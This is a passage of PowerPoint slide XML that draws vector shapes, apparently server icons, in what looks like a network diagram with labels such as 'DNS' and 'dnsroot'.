                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="2381"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2160" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="10545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="11565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="12586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="13606"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="14627"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="15647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="16668"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="17688"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="17688"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1994" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1994" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1994" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2658" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3489" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5151" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6812" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7643" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8474" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9305" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10135" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10966" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11797" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13292" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14123" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="14954" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="15785" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16615" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="17446" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18277" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19108" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="20069"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19938" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5982" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="18539"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7311" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7975" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7975" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="8334"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7311" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="7145" y="9865"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="8142" y="9865"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8142" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="10715"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7145" y="9865"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="8972" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="12462" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="12462" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8972" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="13625" y="1531"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20271" y="1531"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20271" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13625" y="1531"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="18609" y="6463"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="20437" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20437" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18609" y="6463"/>
                  </a:lnTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="F5F1F1"/>
            </a:solidFill>
            <a:ln w="9525">
              <a:solidFill>
                <a:srgbClr val="969696"/>
              </a:solidFill>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-GB"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9281" name="WordArt 173">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B7FA4546-42CE-3F97-70A0-52B44E07EEDE}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1" noChangeShapeType="1" noTextEdit="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10714425" y="4391396"/>
              <a:ext cx="278148" cy="107828"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" fromWordArt="1">
              <a:prstTxWarp prst="textPlain">
                <a:avLst>
                  <a:gd name="adj" fmla="val 50000"/>
                </a:avLst>
              </a:prstTxWarp>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-GB" sz="3600" kern="10">
                  <a:ln w="0">
                    <a:solidFill>
                      <a:schemeClr val="tx1"/>
                    </a:solidFill>
                    <a:round/>
                    <a:headEnd/>
                    <a:tailEnd/>
                  </a:ln>
                  <a:solidFill>
                    <a:srgbClr val="FF0000"/>
                  </a:solidFill>
                  <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>DNS</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9282" name="Text Box 169">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{32527307-9815-2623-FEB3-086F1A7EB122}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10432210" y="4653248"/>
              <a:ext cx="907197" cy="248402"/>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50000"/>
                </a:spcBef>
                <a:buClrTx/>
                <a:buSzTx/>
                <a:buFontTx/>
                <a:buNone/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0" err="1"/>
                <a:t>dnsroot</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="it-IT" sz="1000" b="1" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9283" name="Gruppo 9282">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC51D299-8D02-D6B9-9826-2F847287CAE8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6310508" y="1227608"/>
            <a:ext cx="907197" cy="594801"/>
            <a:chOff x="10432210" y="4306849"/>
            <a:chExt cx="907197" cy="594801"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9284" name="AutoShape 171">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBE5E28B-C166-B816-6517-1DC98623F413}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4306849"/>
              <a:ext cx="378624" cy="350441"/>
            </a:xfrm>
            <a:prstGeom prst="cube">
              <a:avLst>
                <a:gd name="adj" fmla="val 15116"/>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endParaRPr lang="it-IT" altLang="it-IT" sz="1800">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9285" name="mainfrm">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E52EB56-CEBF-153E-4409-F3B3036DD555}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1" noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="10691757" y="4360763"/>
              <a:ext cx="324710" cy="296527"/>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 name="T24" fmla="*/ 326 w 21600"/>
                <a:gd name="T25" fmla="*/ 22180 h 21600"/>
                <a:gd name="T26" fmla="*/ 21559 w 21600"/>
                <a:gd name="T27" fmla="*/ 27893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extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="21600" y="10885"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="21600" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10634" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10800" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="21600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21600" y="10885"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="21600" h="21600" extrusionOk="0">
                  <a:moveTo>
                    <a:pt x="1163" y="19729"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4320" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="16449" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20603" y="19729"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1163" y="19729"/>
                  </a:lnTo>
                  <a:moveTo>
                    <a:pt x="1495" y="2381"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2160" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="2381"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="3402"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="4422"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="5443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="6463"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="7483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="8504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1495" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2160" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4985" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5982" y="9524"/>
                  </a:lnTo>
                  <a:lnTo>
